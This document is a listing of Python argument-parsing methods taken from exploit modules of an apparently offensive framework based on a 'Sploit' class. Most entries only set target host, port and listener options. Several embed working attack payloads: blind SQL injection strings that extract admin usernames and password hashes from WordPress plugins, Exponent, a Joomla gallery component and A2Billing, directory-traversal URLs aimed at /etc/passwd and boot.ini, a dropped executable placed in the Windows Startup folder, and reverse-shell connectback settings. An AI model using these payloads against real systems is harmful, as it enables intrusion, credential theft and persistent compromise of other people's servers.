Example #1
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     if self.args['listener']:
         self.listener_port = self.args['listener']['PORT']
     else:
         self.log("[-] Please enable listener in module options dialog")
         self.finish(False)
Example #2
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', OPTIONS['HOST'])
     self.port = self.args.get('PORT', OPTIONS['PORT'])
     self.filename = str(
         self.args.get('FILENAME/DIRNAME', OPTIONS['FILENAME/DIRNAME']))
     self.action = self.args.get('ACTION', OPTIONS['ACTION'])
Example #3
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     self.port = int(self.args.get('PORT', self.port))
     self.command = self.args.get('COMMAND', self.command)
     self.username = self.args.get('USERNAME', self.username)
     self.password = self.args.get('PASSWORD', self.password)
Example #4
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     self.port = int(self.args.get('PORT', self.port))
     self.path = self.args.get('PATH', OPTIONS['PATH'])
     self.username = self.args.get('USERNAME', self.username)
     self.password = self.args.get('PASSWORD', self.password)
     self.basepath = self.args.get('BASEPATH', self.basepath)
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     self.port = self.args.get('PORT', self.port)
     self.login = self.args.get('LOGIN', self.login)
     self.password = self.args.get('PASSWORD', self.password)
     self.l_port = int(self.args.get('LISTEN PORT', self.l_port))
     return
Example #6
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     self.port = int(self.args.get('PORT', self.port))
     self.username = self.args.get('USERNAME', self.username)
     self.password = self.args.get('PASSWORD', self.password)
     self.basepath = self.args.get('BASEPATH', self.basepath)
     self.callback_ip = self.args.get('CALLBACK_IP', OPTIONS["CALLBACK_IP"])
Example #7
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     self.port = int(self.args.get('PORT', self.port))
     self.path = self.args.get('PATH', OPTIONS['PATH'])
     self.username = self.args.get('USERNAME', self.username)
     self.password = self.args.get('PASSWORD', self.password)
     self.basepath = self.args.get('BASEPATH', self.basepath)
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     self.port = int(self.args.get('PORT', self.port))
     self.username = self.args.get('NEW USERNAME')
     self.password = self.args.get('NEW PASSWORD')
     self.email = self.args.get('NEW EMAIL')
     self.basepath = self.args.get('BASEPATH')
Example #9
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     self.port = int(self.args.get('PORT', self.port))
     self.username = self.args.get('USERNAME', self.username)
     self.password = self.args.get('PASSWORD', self.password)
     self.basepath = self.args.get('BASEPATH', self.basepath)
     self.callback_ip = self.args.get('CALLBACK_IP', OPTIONS["CALLBACK_IP"])
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     self.port = int(self.args.get('PORT', self.port))
     self.filename = self.args.get('FILENAME', 'boot.ini')
     
     self.url = self.make_url('/%2e%2e/' * 16 + self.filename)
     return
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get("HOST", self.host)
     self.port = self.args.get("PORT", self.port)
     self.depth = self.args.get("DEPTH", self.depth)
     self.url = self.args.get("URL", self.url)
     self.system = self.args.get("System", self.system)
     self.file_name = "/etc/passwd" if "GNU" in self.system else "boot.ini"
     return
Example #12
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get("HOST", self.host)
     self.port = self.args.get("PORT", self.port)
     self.depth = self.args.get("DEPTH", self.depth)
     self.url = self.args.get("URL", self.url)
     self.system = self.args.get("System", self.system)
     self.file_name = "/etc/passwd" if "GNU" in self.system else "boot.ini"
     return
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     self.port = int(self.args.get('PORT', self.port))
     
     target = self.args.get('TARGET', "Wnd XP Sp2")
     if '3' in target:
         self.addr = 0x27155CA
     return
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     self.port = int(self.args.get('PORT', self.port))
     
     target = self.args.get('TARGET', "Wnd XP Sp2")
     if '3' in target:
         self.addr = 0x27155CA
     return
Example #15
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get("HOST", self.host)
     self.from_port = self.args.get("FROM_PORT", self.from_port)
     self.to_port = self.args.get("TO_PORT", self.to_port)
     self.nthreads = self.args.get("THREADS", self.nthreads)
     self.type = self.args.get("SEARCH", "opened")
     self.scanner = Scanner(self.from_port, self.to_port, self.host)
     return
Example #16
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     self.from_port = self.args.get('FROM_PORT', self.from_port)
     self.to_port = self.args.get('TO_PORT', self.to_port)
     self.nthreads = self.args.get('THREADS', self.nthreads)
     self.type = self.args.get('SEARCH', 'opened')
     self.scanner = Scanner(self.from_port, self.to_port, self.host)
     return
Example #17
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get("HOST", OPTIONS["HOST"])
     self.port = self.args.get("PORT", OPTIONS["PORT"])
     self.vhost = self.args.get("VHOST", OPTIONS["VHOST"])
     self.vhost = self.vhost if not self.vhost.endswith("/") else self.vhost[0:-1]
     self.path_to_file = self.args.get("PATH TO FILE", OPTIONS["PATH TO FILE"])
     self.url = "http://{}:{}/{}/{}{}".format(self.host, self.port, self.vhost, self.vuln_path, self.path_to_file)
     pass
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     ssl = self.args.get("SSL", OPTIONS["SSL"])
     protocol = "https://" if ssl else "http://"
     self.host = self.args.get("HOST", OPTIONS["HOST"]).replace("/", "").replace("\\","")
     self.port = self.args.get("PORT", OPTIONS["PORT"])
     self.connectback_ip = self.args.get("CONNECTBACK_IP", OPTIONS["CONNECTBACK_IP"])
     if self.args['listener']:
         self.connectback_port = self.args['listener']['PORT']
     self.url = "{proto}{host}:{port}/".format(proto=protocol, host=self.host, port=self.port)
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get("HOST", self.host).replace("/", "").replace("\\","")
     self.port = self.args.get("PORT", self.host)
     self.vhost = self.args.get("VHOST", self.vhost)
     self.vhost = self.vhost if self.vhost.startswith("/") else ("/" + self.vhost)
     self.command = self.args.get("COMMAND", self.command)
     self.url = "http://%s:%s%s" % (self.host, self.port, self.vhost)
     if not self.url.endswith("/"):
         self.url += "/"
Example #20
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     self.port = int(self.args.get('PORT', self.port))
     self.ssl = bool(self.args.get('SSL', self.ssl))
     self.basepath = self.args.get('BASEPATH', self.basepath)
     
     self.url = self.make_url('/form.php?')
     self.data = "module_code=1%27 RLIKE (SELECT(CASE WHEN (SUBSTR((SELECT CONCAT(username,CHAR(58),password) FROM ino_user where ino_user_id=1),{pos},1)=CHAR({char})) THEN 1 ELSE 0x28 END))-- EaST"
     self.data = self.data.replace(' ', '%20')
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     self.port = int(self.args.get('PORT', self.port))
     self.ssl = bool(self.args.get('SSL', self.ssl))
     self.ttl = int(self.args.get('TTL', self.ttl))
     self.basepath = self.args.get('BASEPATH', self.basepath)
     
     self.url = self.make_url('/wp-content/plugins/olimometer/thermometer.php?olimometer_id=1')
     self.data = "%20and%20SUBSTR((SELECT%20CONCAT(user_login,CHAR(58),user_pass)%20FROM%20wp_users%20where%20id=1),{pos},1)=CHAR({char})%20and%20sleep(5)"
Example #22
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', OPTIONS["HOST"])
     self.port = self.args.get('PORT', OPTIONS["PORT"])
     self.path = self.args.get('BASEPATH', OPTIONS["BASEPATH"])
     self.ssl = self.args.get('SSL', OPTIONS['SSL'])
     self.command = self.args.get('COMMAND', OPTIONS["COMMAND"])
     proto = "https" if self.ssl else "http"
     self.url = urlparse.urljoin(
         "{}://{}:{}/".format(proto, self.host, self.port), self.path)
Example #23
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     self.port = int(self.args.get('PORT', self.port))
     self.ssl = bool(self.args.get('SSL', self.ssl))
     self.ttl = int(self.args.get('TTL', self.ttl))
     self.basepath = self.args.get('BASEPATH', self.basepath)
     self.username = self.args.get('USERNAME', self.username)
     self.password = self.args.get('PASSWORD', self.password)
     self.url = self.make_url('/exponent-2.4.0/index.php')
     self.data = "action=manage_ranks&controller=container&lastpage=http://192.168.1.207/exponent-2.4.0/untitled&model=container&rerank[]=alesha/' AND (SELECT * FROM (select IF((SUBSTRING((SELECT CONCAT(username,CHAR(58),password) FROM exponent_user where id=1),{pos},1)) = CHAR({char}), SLEEP(5), '1'))A) AND 'a'='a&src=@section1"
Example #24
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', OPTIONS['HOST'])
     self.port = self.args.get('PORT', OPTIONS['PORT'])
     self.connectback_ip = self.args.get('CONNECTBACK_IP',
                                         OPTIONS['CONNECTBACK_IP'])
     if not self.args.get('listener'):
         self.log('[!] Please enable listener')
         self.finish(False)
     self.listener_port = self.args['listener']['PORT']
     self.filename = '/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup/test.exe'
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     self.port = int(self.args.get('PORT', self.port))
     self.ssl = bool(self.args.get('SSL', self.ssl))
     self.ttl = int(self.args.get('TTL', self.ttl))
     self.basepath = self.args.get('BASEPATH', self.basepath)
     self.username = self.args.get('USERNAME', self.username)
     self.password = self.args.get('PASSWORD', self.password)
     self.url = self.make_url('/exponent-2.4.0/index.php')
     self.data = "action=manage_ranks&controller=container&lastpage=http://192.168.1.207/exponent-2.4.0/untitled&model=container&rerank[]=alesha/' AND (SELECT * FROM (select IF((SUBSTRING((SELECT CONCAT(username,CHAR(58),password) FROM exponent_user where id=1),{pos},1)) = CHAR({char}), SLEEP(5), '1'))A) AND 'a'='a&src=@section1"
Example #26
0
    def args(self):
        self.args = Sploit.args(self, OPTIONS)
        self.host = self.args.get("HOST", self.host)
        self.port = int(self.args.get("PORT", self.port))
        self.ssl = bool(self.args.get("SSL", self.ssl))
        self.basepath = self.args.get("BASEPATH", self.basepath)

        self.url = self.make_url(
            "/index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%28substring%28%28select%20concat%28username,char%2858%29,password%29%20from%20{table}%20order%20by%20registerDate%20desc%20limit%201%29,{pos},1%29=char%28{char}%29%29%20THEN%204%20ELSE%200x28%20END%29%29"
        )
        return
Example #27
0
    def args(self):
        self.args = Sploit.args(self, OPTIONS)
        self.host = self.args.get('HOST', self.host)
        self.port = int(self.args.get('PORT', self.port))
        self.path = self.args.get('PATH', OPTIONS['PATH'])

        self.urls = [
            'api/xml?file=/', 'api/xml?file=../../../../../../../../../',
            'api/file/download/', 'api/file/content/',
            'api/server/videosnap?file=../../../../../../../../../'
        ]
    def args(self):
        self.args = Sploit.args(self, OPTIONS)
        self.host = self.args.get('HOST', self.host)
        self.port = int(self.args.get('PORT', self.port))
        self.ssl = bool(self.args.get('SSL', self.ssl))
        self.ttl = int(self.args.get('TTL', self.ttl))
        self.basepath = self.args.get('BASEPATH', self.basepath)

        self.url = self.make_url(
            '/wp-content/plugins/olimometer/thermometer.php?olimometer_id=1')
        self.data = "%20and%20SUBSTR((SELECT%20CONCAT(user_login,CHAR(58),user_pass)%20FROM%20wp_users%20where%20id=1),{pos},1)=CHAR({char})%20and%20sleep(5)"
    def args(self):
        self.args = Sploit.args(self, OPTIONS)
        self.host = self.args.get('HOST', self.host)
        self.port = int(self.args.get('PORT', self.port))
        self.ssl = bool(self.args.get('SSL', self.ssl))
        self.basepath = self.args.get('BASEPATH', self.basepath)

        self.url = self.make_url(
            '/index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%28substring%28%28select%20concat%28username,char%2858%29,password%29%20from%20{table}%20order%20by%20registerDate%20desc%20limit%201%29,{pos},1%29=char%28{char}%29%29%20THEN%204%20ELSE%200x28%20END%29%29'
        )
        return
Example #30
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     self.port = int(self.args.get('PORT', self.port))
     self.filed = self.args.get('FILENAME', self.filed)
     self.ssl = self.args.get('SSL', self.ssl)
     if self.ssl:
         self.url = "https://"+self.host+":"+str(self.port)
     else:
         self.url = "http://"+self.host+":"+str(self.port)
     return
    def args(self):
        self.args = Sploit.args(self, OPTIONS)
        self.host = self.args.get('HOST', self.host)
        self.port = int(self.args.get('PORT', self.port))
        self.path = self.args.get('PATH', OPTIONS['PATH'])

        self.urls = [
            'Esprit/public/Password.jsp?orgName=../../../../../../../../../',
            'Esprit/ES/Login?orgUnitName=../../../../../../../../../',
            'dalimws/log?len=10000&download=true&file=../../../../../../../'
        ]
Example #32
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', OPTIONS['HOST'])
     self.port = self.args.get('PORT', OPTIONS['PORT'])
     self.connectback_ip = self.args.get('CONNECTBACK_IP',
                                         OPTIONS['CONNECTBACK_IP'])
     if self.args['listener']:
         self.listener_port = self.args['listener']['PORT']
     else:
         self.log('[-] Please enable listener')
         self.finish(False)
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     self.port = int(self.args.get('PORT', self.port))
     self.basepath = self.args.get('BASEPATH', self.basepath)
     self.ssl = self.args.get('SSL', self.ssl)
     
     if self.ssl:
         context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
         opener = urllib2.build_opener(urllib2.HTTPSHandler(context=context))
         urllib2.install_opener(opener)
    def args(self):
        self.args = Sploit.args(self, OPTIONS)
        self.host = self.args.get('HOST', self.host)
        self.port = int(self.args.get('PORT', self.port))
        self.ssl = bool(self.args.get('SSL', self.ssl))
        self.ttl = int(self.args.get('TTL', self.ttl))
        self.basepath = self.args.get('BASEPATH', self.basepath)

        self.url = self.make_url('/wp-content/plugins/dtracker/download.php?')
        self.data = "id=(CASE WHEN (SUBSTR((SELECT CONCAT(user_login,CHAR(58),user_pass) FROM wp_users where id=1),{pos},1)=CHAR({char})) THEN SLEEP(5) ELSE 7148 END)"
        self.data = self.data.replace(' ', '%20')
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     self.port = int(self.args.get('PORT', self.port))
     self.basepath = self.args.get('BASEPATH', self.basepath)
     self.username = self.args.get('USERNAME', self.username)
     self.password = self.args.get('PASSWORD', self.password)
     self.ssl = self.args.get('SSL', self.ssl)
     
     self.cookiesjar = cookielib.CookieJar()
     opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiesjar))
     urllib2.install_opener(opener)
Example #36
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get("HOST", OPTIONS["HOST"])
     self.port = self.args.get("PORT", OPTIONS["PORT"])
     self.vhost = self.args.get("VHOST", OPTIONS["VHOST"])
     self.vhost = self.vhost if not self.vhost.endswith("/") else self.vhost[0:-1]
     self.url = "http://{}:{}/{}/".format(self.host, self.port, self.vhost)
     self.connectback_host = self.args.get("CONNECT_BACK_HOST", OPTIONS["CONNECT_BACK_HOST"])
     self.log_file = self.args.get("LOG_FILE", OPTIONS["LOG_FILE"])
     self.method = self.args.get("METHOD", OPTIONS["METHOD"])
     if self.args['listener']:
         self.listener_port = self.args['listener']['PORT']
Example #37
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', OPTIONS["HOST"])
     self.ssl = self.args.get('SSL', OPTIONS['SSL'])
     self.table = self.args.get('TABLE', OPTIONS['TABLE'])
     self.column = self.args.get('COLUMN', OPTIONS['COLUMN'])
     self.ttl = self.args.get('TTL', OPTIONS['TTL'])
     self.debug = self.args.get('SHOW EVERY FOUND SYMBOL', OPTIONS['SHOW EVERY FOUND SYMBOL'])
     proto = "https" if self.ssl else "http"
     self.url = "{}://{}".format(proto, self.host) + "/a2billing/customer/iridium_threed.php?transactionID="
     self.vuln_data = '-1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,if(ascii(mid(IFNULL(CAST({column} AS CHAR),0x20),{char_pos},1))={char_ord},sleep({ttl}),0) from {table} LIMIT {entry_no},1'
     self.log(self.url)
    def args(self):
        self.args = Sploit.args(self, OPTIONS)
        self.host = self.args.get("HOST", self.host)
        self.port = int(self.args.get("PORT", self.port))
        self.path = self.args.get("PATH", self.path)
        self.filename = self.args.get("FILENAME", self.filename)
        self.ssl = bool(self.args.get('SSL', False))

        if self.ssl:
            context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
            opener = urllib2.build_opener(urllib2.HTTPSHandler(context=context))
            urllib2.install_opener(opener)
Example #39
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get("HOST",
                               self.host).replace("/",
                                                  "").replace("\\", "")
     self.port = self.args.get("PORT", self.host)
     self.vhost = self.args.get("VHOST", self.vhost)
     self.vhost = self.vhost if self.vhost.startswith("/") else ("/" +
                                                                 self.vhost)
     self.command = self.args.get("COMMAND", self.command)
     self.url = "http://%s:%s%s" % (self.host, self.port, self.vhost)
     if not self.url.endswith("/"):
         self.url += "/"
    def args(self):
        self.args = Sploit.args(self, OPTIONS)
        self.host = self.args.get('HOST', self.host)
        self.port = int(self.args.get('PORT', self.port))
        self.ssl = bool(self.args.get('SSL', self.ssl))
        self.username = self.args.get('USERNAME', self.username)
        self.password = self.args.get('PASSWORD', self.password)
        self.auth_method = self.args.get('AUTH_METHOD', self.auth_method)
        self.hostname = self.args.get('HOSTNAME', self.hostname)
        self.template = self.args.get('TEMPLATE', self.template)
        self.vmid = self.args.get('VMID', self.vmid)

        return
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', OPTIONS["HOST"])
     self.port = self.args.get('PORT', OPTIONS["PORT"])
     self.path = self.args.get('BASEPATH', OPTIONS["BASEPATH"])
     self.ssl = self.args.get('SSL', OPTIONS['SSL'])
     self.connectback_ip = self.args.get('CONNECTBACK_IP', OPTIONS["CONNECTBACK_IP"])
     if self.args['listener']:
         self.listener_port = self.args['listener']['PORT']
     else:
         self.log("Please enable listener to recieve connection from remote shell")
         self.finish(False)
     proto = "https" if self.ssl else "http"
     self.url = urlparse.urljoin("{}://{}:{}/".format(proto, self.host, self.port), self.path)
Example #42
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get("HOST", OPTIONS["HOST"])
     self.port = self.args.get("PORT", OPTIONS["PORT"])
     self.vhost = self.args.get("VHOST", OPTIONS["VHOST"])
     self.vhost = self.vhost if not self.vhost.endswith(
         "/") else self.vhost[0:-1]
     self.url = "http://{}:{}/{}/".format(self.host, self.port, self.vhost)
     self.connectback_host = self.args.get("CONNECT_BACK_HOST",
                                           OPTIONS["CONNECT_BACK_HOST"])
     self.log_file = self.args.get("LOG_FILE", OPTIONS["LOG_FILE"])
     self.method = self.args.get("METHOD", OPTIONS["METHOD"])
     if self.args['listener']:
         self.listener_port = self.args['listener']['PORT']
Example #43
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', OPTIONS["HOST"])
     self.port = self.args.get('PORT', OPTIONS["PORT"])
     self.path = self.args.get('BASEPATH', OPTIONS["BASEPATH"])
     self.ssl = self.args.get('SSL', OPTIONS['SSL'])
     self.connectback_ip = self.args.get('CONNECTBACK_IP', OPTIONS['CONNECTBACK_IP'])
     if self.args['listener']:
         self.listener_port = self.args['listener']['PORT']
     else:
         self.log("[!] Please enable listener to recieve connection from remote shell")
         self.finish(False)
     proto = "https" if self.ssl else "http"
     self.url = urlparse.urljoin("{}://{}:{}/".format(proto, self.host, self.port), self.path)
Example #44
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', OPTIONS["HOST"])
     self.port = self.args.get('PORT', OPTIONS["PORT"])
     self.path = self.args.get('BASEPATH', OPTIONS["BASEPATH"])
     self.ssl = self.args.get('SSL', OPTIONS['SSL'])
     self.ttl = self.args.get('TTL', OPTIONS['TTL'])
     self.table = self.args.get('TABLE', OPTIONS['TABLE'])
     self.column = self.args.get('COLUMN', OPTIONS['COLUMN'])
     self.debug = self.args.get('SHOW EVERY FOUND SYMBOL', OPTIONS['SHOW EVERY FOUND SYMBOL'])
     proto = "https" if self.ssl else "http"
     self.url = urlparse.urljoin("{}://{}:{}/".format(proto, self.host, self.port), self.path) + "/load_data_for_search.php?sql="
     self.vuln_data = ('SELECT * FROM (SELECT(SLEEP({ttl}-(IF(ORD(MID((SELECT '
                     '(IFNULL(CAST({column} AS CHAR),0x20)) FROM {table} LIMIT '
                     '{entry_no},1),{char_pos},1))={char_ord},0,{ttl})))))beSz'
                       )
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     self.port = int(self.args.get('PORT', self.port))
     self.basepath = self.args.get('BASEPATH', self.basepath)
     self.callback_ip = self.args.get('CALLBACK_IP', OPTIONS["CALLBACK_IP"])
Example #46
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get("HOST", self.host)
     self.port = int(self.args.get("PORT", self.port))
     self.new_pass = self.args.get("NEW_PASSWORD", OPTIONS["NEW_PASSWORD"])
     self.basepath = self.args.get("BASEPATH", self.basepath)
Example #47
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.command_exec = self.args.get('COMMAND', self.command_exec)
     return
Example #48
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get("HOST", self.host)
     self.port = int(self.args.get("PORT", self.port))
     self.cmd = self.args.get("CMD", self.cmd)
     return
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     self.port = int(self.args.get('PORT', self.port))
     self.callback_ip = self.args.get('CALLBACK_IP', OPTIONS["CALLBACK_IP"])
     self.version = self.args.get('TARGET_VERSION', "9.1.14")
Example #50
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get("HOST", self.host)
     self.port = int(self.args.get("PORT", self.port))
     self.filename = self.args.get("FILENAME", "c:/boot.ini")
     return
Example #51
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.callback_ip = self.args.get('CALLBACK_IP', OPTIONS["CALLBACK_IP"])
Example #52
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     return
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     self.port = int(self.args.get('PORT', self.port))
     return
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get("HOST", self.host)
     self.port = int(self.args.get("PORT", self.port))
     self.callback_ip = self.args.get("CALLBACK_IP", OPTIONS["CALLBACK_IP"])
     self.version = self.args.get("TARGET_VERSION", "9.1.16")
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     if self.args['listener']:
         port = int(self.args['listener']['PORT'])
     return
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.host = self.args.get('HOST', self.host)
     self.port = int(self.args.get('PORT', self.port))
     self.path = self.args.get('PATH', OPTIONS['PATH'])
     self.basepath = self.args.get('BASEPATH', self.basepath)
Example #57
0
 def args(self):
     self.args = Sploit.args(self, OPTIONS)
     self.port = int(self.args.get('CONNECTBACK_PORT', self.port))
     return